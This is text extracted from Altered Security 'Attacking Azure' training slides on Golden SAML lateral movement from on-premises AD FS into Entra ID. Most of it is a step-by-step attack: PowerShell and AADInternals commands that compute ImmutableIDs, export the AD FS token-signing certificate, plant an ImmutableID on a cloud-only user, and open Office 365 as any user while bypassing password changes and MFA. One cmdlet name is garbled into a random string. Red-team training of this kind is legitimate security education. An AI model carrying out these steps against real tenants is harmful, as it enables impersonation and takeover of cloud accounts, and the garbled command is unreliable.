Federation

In ADFS, SAML Response is signed by a token-signing certificate. • If the certificate is compromised, it is possible to authenticate to the Entra ID as ANY user in Entra ID! • Just like our PTA abuse, password change for a user or MFA won't have any effect because we are forging the authentication response. • The certificate can be extracted from the AD FS server with DA privileges and then can be used from any internet connected machine. • This is what the infamous Golden SAML attacks is! Attacking Azure © Altered Security. All rights reserved 234AlteredSecurity Lateral Movement - Federation - On-Prem to Cloud • From any on-prem machine as a normal domain user, get the ImmutableID of the target user [System.Convert]::ToBase64String((Get-ADUser -Identity onpremuser | select -ExpandProperty ObjectGUID).tobytearray()) • On AD FS server (as administrator) Get-AdfsProperties |select identifier • Check the IssuerURI from Entra ID too (Use MSOL module and need GA privs) Get-MP7GHiKeVCbKTgEhuyuUnkGg6HdQt5oKyX -DomainName deffin.com | select IssuerUri Note: When setting up the AD FS using Entra Connect, there is a difference between IssuerURI on ADFS server and Entra ID. Use the one from AzureAD. Attacking Azure © Altered Security. All rights reserved 235AlteredSecurity Lateral Movement - Federation - On-Prem to Cloud • With DA privileges on-prem, we can extract the ADFS token signing certificate from the ADFS server using AADInternals Export-AADIntADFSSigningCertificate • Use the below command from AADInternals to access cloud apps as the user whose immutableID is specified Open-AADIntOffice365Portal -ImmutableID v1pOC7Pz8kaT6JWtThJKRQ== -Issuer http://deffin.com/adfs/services/trust -PfxFileName C:\users\adfsadmin\Documents\ADFSSigningCertificate.pfx - Verbose Attacking Azure © Altered Security. All rights reserved 236AlteredSecurity Lateral Movement - Federation - On-Prem to Cloud With DA privileges on-prem, it is possible to create ImmutableID of cloud only users with access to Entra Connect Sync credentials! • Create a realistic ImmutableID and set it for a cloud only user [System.Convert]::ToBase64String((New-Guid).tobytearray()) Set-AADIntAzureADObject -CloudAnchor "User_594e67c3-c39b-41bb-ac50- cd8cd8bb780f" -SourceAnchor "pwrtlmsicU+5tgCUgHx2tA==" • Using AADInternals, export the token signing certificate Export-AADIntADFSSigningCertificate • Use the below command from AADInternals to access cloud apps as the user whose immutableID is specified Open-AADIntOffice365Portal -ImmutableID pwrtlmsicU+5tgCUgHx2tA== - Issuer http://deffin.com/adfs/services/trust -PfxFileName C:\users\adfsadmin\Desktop\ADFSSigningCertificate.pfx -Verbose